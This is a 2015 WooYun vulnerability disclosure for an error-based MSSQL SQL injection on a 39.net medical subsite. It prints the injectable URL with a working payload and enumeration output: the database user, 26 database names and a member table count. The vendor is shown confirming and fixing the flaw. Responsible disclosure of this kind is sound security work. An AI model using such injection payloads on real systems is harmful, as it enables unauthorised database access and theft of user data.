当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114504

漏洞标题:39建康网某站点MSSQL报错注入

相关厂商:39健康网

漏洞作者: lijiejie

提交时间:2015-05-16 19:37

修复时间:2015-05-20 17:49

公开时间:2015-05-20 17:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-16: 细节已通知厂商并且等待厂商处理中
2015-05-18: 厂商已经确认,细节仅向厂商公开
2015-05-20: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

39建康网某站点MSSQL报错注入

详细说明:

注入点:

http://med.39.net/cds/ywxhzy/list.aspx?LeftNavId=6&LeftNavSubId=6&PageIndex=1&SecondId=convert(int,system_user)


MSSQL报错注入。

39.net.png

漏洞证明:

current user:    'cme_kieye'
current database: 'cme'
available databases [26]:
[*] 39Security
[*] 39Security_15
[*] 39Security_17
[*] cme
[*] cme_beta
[*] DataCenter
[*] DataSetting_test
[*] distribution
[*] master
[*] medphoto
[*] MobileData
[*] model
[*] msdb
[*] PhotoDB
[*] ProductLibData
[*] ProductLibSetting
[*] RuiHui
[*] RuiHui2012
[*] Security39
[*] SecurityNew
[*] Survey
[*] tempdb
[*] wcyx
[*] xiaopro
[*] YaYuDB
[*] YunYinDB
Database: cme
+------------+---------+
| Table | Entries |
+------------+---------+
| dbo.Member | 80852 |
+------------+---------+

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-18 08:40

厂商回复:

稍后安排修复

最新状态:

2015-05-20:已修复


漏洞评价:

评论

  1. 2015-05-23 21:11 | Eric_zZ ( 路人 | Rank:8 漏洞数:5 | Just try it!)

    菜鸟问一句,你是在网址后面加了(int,system_user),然后报错判断出是注入点吗?还是本身网站后面就有(int,system_user),求教。